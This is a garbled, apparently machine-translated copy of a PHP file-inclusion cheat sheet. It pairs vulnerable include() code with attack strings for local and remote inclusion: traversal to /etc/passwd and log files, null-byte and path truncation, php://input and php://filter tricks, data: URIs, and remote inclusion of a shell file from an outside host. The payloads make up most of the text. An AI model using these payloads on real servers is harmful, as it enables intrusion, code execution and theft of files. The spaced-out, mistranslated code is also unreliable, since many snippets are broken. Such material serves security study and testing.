This article briefly analyzes a vulnerability analysis of inlcude when the PHP file is included. I hope it will be of some use to you.
Basic File Inclusion vulnerabilities:
The Code is as follows: |
Copy code |
<? Php include ("des/". $ _ GET ['file']);?> * Files in the same path: ? File =. htaccess * Path traversal: ? File =.../../var/lib/locate. db (This file is very interesting because it allows you to search for a file system) * Files containing PHP code injection: ? File =.../../var/log/apache/error. log (You can find other possible Apache dirs here and other ways here. Think about all possible logfiles, file uploads, session files etc .)
|
Restricted local files include:
The Code is as follows: |
Copy code |
<? Php include ("des/". $ _ GET ['file']. cmd.htm ");?> * Null Byte Injection ): ? File = ../etc/passwd % 00 (Magic_quotes_gpc = off is required) * Column directory (Null Byte Injection ): ? File =.../../var/www/accounts/% 00 (BSD only, magic_quotes_gpc = off, details here) * Path Truncation ): ? File = .. /.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd .............. (For more information, see here and here) * Point truncation: ? File =.../../etc/passwd ................ ... (Windows only. For more details, see here)
|
Basic remote files include:
The Code is as follows: |
Copy code |
<? Php include ($ _ GET ['file']);?>
* Including Remote Code ): ? File = [http | https | ftp]: // websec.wordpress.com/shell.txt (Allow_url_fopen = On and allow_url_include = On are required) * Use the php input stream (Using PHP stream php: // input ): ? File = php: // input (Specify your payload in the POST parameters, watch urlencoding, details here, requires allow_url_include = On) * Use the PHP filter function (Using PHP stream php: // filter ): ? File = php: // filter/convert. base64-encode/resource = index. php (Lets you read PHP source because it wont get evaluated in base64. More details here and here) * Using data URIs: ? File = data: // text/plain; base64, SSBsb3ZlIFBIUAo = (Allow_url_include = On is required) |
* Cross-site scripting (Using XSS ):
The Code is as follows: |
Copy code |
? File = http: // 127.0.0.1/path/xss. php? Xss = phpcode (Makes sense if firewalled or only whitelisted domains allowed)
|
Restricted Remote File Inclusion Vulnerability
The Code is as follows: |
Copy code |
<? Php include ($ _ GET ['file']. cmd.htm ");?> *? File = http://websec.wordpress.com/shell *? File = http://websec.wordpress.com/shell.txt? *? File = http://websec.wordpress.com/shell.txt%23 (Allow_url_fopen = On and allow_url_include = On are required)
|
Static Remote File Inclusion Vulnerability:
The Code is as follows: |
Copy code |
<? Php include ("http: // 192.168.1.10/config. php");?> * Man In The Middle) (Lame indeed, but often forgotten) |
From Reiners 'weblog.